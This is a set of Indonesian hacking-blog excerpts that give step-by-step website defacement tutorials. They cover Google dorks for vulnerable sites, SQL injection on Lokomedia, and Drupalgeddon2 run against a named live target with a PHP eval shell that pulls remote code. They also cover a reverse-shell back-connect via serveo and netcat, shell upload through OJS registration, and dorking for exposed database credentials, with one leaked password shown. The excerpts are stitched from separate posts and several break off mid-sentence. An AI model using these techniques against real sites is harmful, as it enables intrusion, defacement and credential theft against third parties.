Heboh WOW

View Source di ANDROID dan PC        Ketika kita sedang membuat website, blog, dll dan bingung saat menata layout atau memilih warna yang cocok untuk website, salah satu trik umum yang digunakan untuk mencari ide adalah dengan mengunjungi web yang memiliki desain yang bagus.       Saat  kita mengunjungi web tersebut, pasti ada pertanyaan tentang bagaimana sang creator membuat layout yang indah pada websitenya, apa saja kode css dan html yang digunakan, warna apa saja yang digunakan. Semua browser memungkinkan pengguna untuk melihat HTML atau skrip lain pada halaman web yang di kunjungi. kalau untuk bocah bocah defacing sih biasanya di gunakan buat nyolong script deface wkwkwk :v      nah cara melihat script tersebut kita menggunakan  View Source  VIEW SOURCE DI ANDROID    semua orang sering kebingungan bagaimana view source di Android , pas di jalan kita terkadang lagi ga ada kerjaan , mau design web tapi ga bawa laptop , trus mau lihat referensi dari web lain memakai view source gak b

Lets say hello heters !!              Welcome para jones.homo.dan jenis lainnya , Ok kali ini aink share tutorial  deface mothode sqli lokomedia ..udh kagak asing yah poc yg satu ini sering liat para master show off di group-group hekel dg poc yg satu ini karna liat para master show off jadi ingin biasa poc sqli lokomedia baca” di google kebanyakan pada ngawur wkowkow kali ini saya akan bahas Cara Deface Dg Methode SQLI Lokomedia di simak yak….. Alat” persiapan perang -Internet udh pasti eta wkowkwo -dork inurl:/statis-1-profil.html inurl:/statis-2-profil.html inurl:/statis-3-profil.html kembangin dah tuh dork yg diatas biar dapet yg verawan susah ngembangin dork? Sering” nongkrong di nekopoi..sering” nonton video JAV (Japan Astaghfirullah Vidio) -Exploit (Nanti Di Bawah) -sabun bila di perlukan       Ok dah langsung ke langkah pertama Kita dorking dulu di mbah gugel kira" seperti itulah penampakan nya di google pemirsa :v.... Lanjut Kelangkah Ke Dua Pilih sala satu web yg menurut

Apa itu curl? cURL merupakan sebuah fungsi yang berguna untuk meng-grab / mengambil konten dari sebuah halaman website. Dengan cURL pula kita bisa melakukan simulasi request method POST ke server (mengirim sebuah parameter dari sebuah form dengan method POST). About cURL cara mendownload file lewat cURL comand: "curl -O webTarget.com/fileNya.png identifkasi HTTP Curl digunakan untuk mengidentifikasi metode HTTP yang membantu dalam penghitungan kata kerja http comand : "curl -v -X OPTIONS webNya.com" mungkin cukup sekian aja dulu.

 DRUPAL RCE UPLOAD SHELL      hai ketemu lagi dengan saya , kali ini saya membagikan tutorial deface menggunakan teknik DRUPAL RCE , tutorial deface ini menggunakan tools di terminal dengan bahasa Ruby . langsung saja tutorial nya ya :) metode ini di gunakan untuk website yang memakai CMS Drupal dork : inurl:"*drupal_ajax" intext:"powered by drupal"     dork kembangin setelah menemukan site drupal tinggal eksekusi pakai tools nya saja buka terminal : $ apt-get install git $ gem install ruby $ git clone https://github.com/dreadlocked/Drupalgeddon2 buka file nya  $ cd Drupalgeddon2 cara pakai nya $ ruby drupalgeddon2.rb <site> contoh live target : $ ruby drupalgeddon2.rb http://boatsmedia.in/ jika berhasil nanti web nya ter connect ke terminal lo   cek dengan perintah $ uname -a jika nanti muncul kernal web maka artinya berhasil tinggal eksekusi deh . kalo mau tanam shell tinggal ketik gini $ echo '<?php eval("?>".file_get_contents(" ht

hello , assalamualaikum wr.wb ketemu lagi dengan saya cyberscry :v kali ini saya akan membagikan sedikit tips & tutorial mencari login admin menggunakan dork , selain kita terpacu pada admin finder memakai wordlist yang tidak efisien apalagi terhadap site indo . maka menggunakan dork lah yang lebih efisien . caranya mudah aja dorking login admin web nya di google atau search engine lain dork nya yang berhubungan dengan admin login , misal : inurl:/admin/ inurl:/login.php intext:"Username" intext:"Password" dan lain lain lalu kita tambahkan site target di belakang nya contoh : inurl:/login.php site:lamonganxploiter.org                 inurl:/admin/ site:lamonganxploiter.org  dan lain lain bisa kalian kembangkan sendiri ,  sekian semoga bermanfaat wassalamualaikum wr.wb

menambahkan music di script deface       hay ketemu lagi dengan saya . hari ini saya akan share cara supaya script deface kalian ada lagu nya . untuk script saya ini lagu di ambil dari url youtube .    langsung saja copy script yang di bawah ini dan paste kan ke script deface kalian <iframe width="1" height="0" src="https://www.youtube.com/embed/ KODE-LAGU ?rel=0&autoplay=1" frameborder="0" allowfullscreen></iframe>    untuk tulisan yang saya merahin itu adalah kode di youtube di ganti lagu sesuka kalian     cara nya langsung saja putar lagu yang anda pilih di youtube , nanti muncul code nya seperti contoh di bawah dan hasilnya nanti script nya seperti ini <iframe width="1" height="0" src="https://www.youtube.com/embed/ Rgh_CYM_tnM ?rel=0&autoplay=1" frameborder="0" allowfullscreen></iframe> tinggal di paste ke script deface kita dan done :) sekian

assalamualaikum wr.wb hai kak ketemu lagi dengan saya CYBERSCRY kali ini saya akan share tutorial BACK CONNECT / PORT FORWARDING menggunakan SERVEO PERL ON ( karena script Back Connet dalam shell nya menggunakan Script Perl ) biasanya sih orang orang back connect menggunakan NGROK , menurut saya sih lebih enakan menggunakan SERVEO karena lebih efisien , sebelumnya juga saya sudah jelaskan tentang SERVEO dan kelebihan SERVEO disini  http://www.lamonganxploiter.blogspot.com/2018/03/serveo-alternatif-ngrok.html nah kita langsung saja ya buka tab terminal $ pkg install openssh $ ssh -R 4949:localhost:4444 serveo.net (kita menggunakan port forward 4949 dan local port 4444 , bisa kalian ubah se unik mungkin supaya tidak sama di pakai orang lain) itu di forward IP ke 195.201.91.242 dan PORT 4949 LIHAT GAMBAR ( 195.201.91.242 : 4949 untuk digunakan BACK CONNECT nya nanti di dalam shell ) setelah itu kita buka tab baru untuk me listen forwarding nya menggunakan netcat $ nc -lnvp 4444 ( 4444 ada

euy hari ini gue share  Cara Deface Open Journal System atau se ring di sebut OJS       OJS ini kebanyakan berada di website perkuliahan dan perkantoran , kelemahan OJS berada di tempat pendaftaran sebagai Peng UPLOAD jurnal nya dan uploader nya vuln file ber ekstensi .phtml ( untuk upload shell nanti nya ) Dork :  intext:Journal "new submission" inurl:/index.php/index/user/register intext:about submission "Journal" inurl:/index.php/ojs dork kembangin lah biar dapet web yg masih jarang di sentuh orang lain Tutorial : 1.  Kamu harus mendaftar dulu disini  > http:// www. site . com /index.php/inde x /user/register - Isi yang di perlukan  - Jangan Lupa untuk mencentang Registrasi sebabagi Author / penulis  - Jangan ceklis Email konfimasi 2. setelah register nanti pilih [ new submission ] 3 .  Selesaikan Step 1 4.  Di Step 2, kamu dapat upload shell (format shell . phtml ) 5. Jika Sukses ! maka akan muncul seperti ini 6. Cari akses shell nya Penjelasan : 1835

hae para pencari anu :v         kali ini saya akan memberikan Tutorial Mencari cPanel Menggunakan Dork . pada dasarnya password cpanel default itu sama dengan password database , nah kita gunakan id dan pass database untuk login ke cpanel web siapa tahu anda beruntung :v       Nah tanpa basa basi saya langsung membahas tentang  Tutorial Mencari nya Menggunakan Dork.        CPanel merupakan control panel web yang berguna untuk menyimpan/menambah/mengedit semua direktori dari suatu web. Nah, kita bisa mencari sebuah cpanel dari suatu web menggunakan bantuan dari google, yaitu menggunakan dork. 1. Ketik dork berikut ke kotak pencari google : intext:"/** MySQL database username */" site:   intext:"/** MySQL database password */" site:     kembangin sendiri ea :v     2. Dari hasil penesuluran, buka salah satu. Nanti anda akan melihat penampakan seperti ini 3. Coba perhatikan text ini DB_USER', 'dreambox_wrdp1 DB_PASSWORD', '4d57[Z48CKo5 Itu adalah usernam